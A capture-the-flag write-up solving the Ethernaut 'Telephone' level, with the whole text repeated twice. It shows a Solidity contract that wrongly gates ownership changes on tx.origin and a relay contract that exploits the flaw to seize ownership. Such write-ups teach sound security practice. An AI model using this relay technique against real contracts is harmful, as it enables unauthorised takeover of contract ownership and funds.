This is my solution to the fourth challenge of ethernaut: https://ethernaut.openzeppelin.com/level/0x0b6F6CE4BCfB70525A31454292017F640C10c768

This problem is for a pretty simple contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {

  address public owner;

  constructor() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

It simply has an owner and a function to change the owner. When we change the owner, we only allow it to get changed if tx.origin is not the current caller of the function. I did not know what tx.origin was, so after some googling I found an answer. It is the first non-contract address that called the function. ie. in a call chain that looks like this:

A → B → C → D

A user A makes a call to contract B, which calls a function on contract C that calls something on contract D. In this chain, if we chack tx.origin on contract D, it will be A . However, the msg.sender will be C.

To solve this problem, I needed to call the changeOwner function through a relay contract. This way, tx.origin will be my wallet, and msg.sender will be the address of the relay contract. I created, compiled and deployed the relay contract using the Remix IDE

pragma solidity ^0.6.0;

contract TelephoneRelay {

    function relay () public {
        address addr = 0x4F9f093efd94c7b81f954Bd7648805a98b5Ce230;
        (bool success, bytes memory result) = addr.call(abi.encodeWithSignature("changeOwner(address)", msg.sender));

        require(success, "Relay not successful");
    }
}

I got the address of my problem contract and called the changeOwner function with the low level address.call function. More info about that here. Sure enough, the owner was updated with my address. Success!

1. There is a difference between tx.origin and msg.sender and we have to keep this difference in mind when using tx.origin because we can end up with security holes

This is my solution to the fourth challenge of ethernaut: https://ethernaut.openzeppelin.com/level/0x0b6F6CE4BCfB70525A31454292017F640C10c768

This problem is for a pretty simple contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {

  address public owner;

  constructor() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}

It simply has an owner and a function to change the owner. When we change the owner, we only allow it to get changed if tx.origin is not the current caller of the function. I did not know what tx.origin was, so after some googling I found an answer. It is the first non-contract address that called the function. ie. in a call chain that looks like this:

A → B → C → D

A user A makes a call to contract B, which calls a function on contract C that calls something on contract D. In this chain, if we chack tx.origin on contract D, it will be A . However, the msg.sender will be C.

To solve this problem, I needed to call the changeOwner function through a relay contract. This way, tx.origin will be my wallet, and msg.sender will be the address of the relay contract. I created, compiled and deployed the relay contract using the Remix IDE

pragma solidity ^0.6.0;

contract TelephoneRelay {

    function relay () public {
        address addr = 0x4F9f093efd94c7b81f954Bd7648805a98b5Ce230;
        (bool success, bytes memory result) = addr.call(abi.encodeWithSignature("changeOwner(address)", msg.sender));

        require(success, "Relay not successful");
    }
}

I got the address of my problem contract and called the changeOwner function with the low level address.call function. More info about that here. Sure enough, the owner was updated with my address. Success!

1. There is a difference between tx.origin and msg.sender and we have to keep this difference in mind when using tx.origin because we can end up with security holes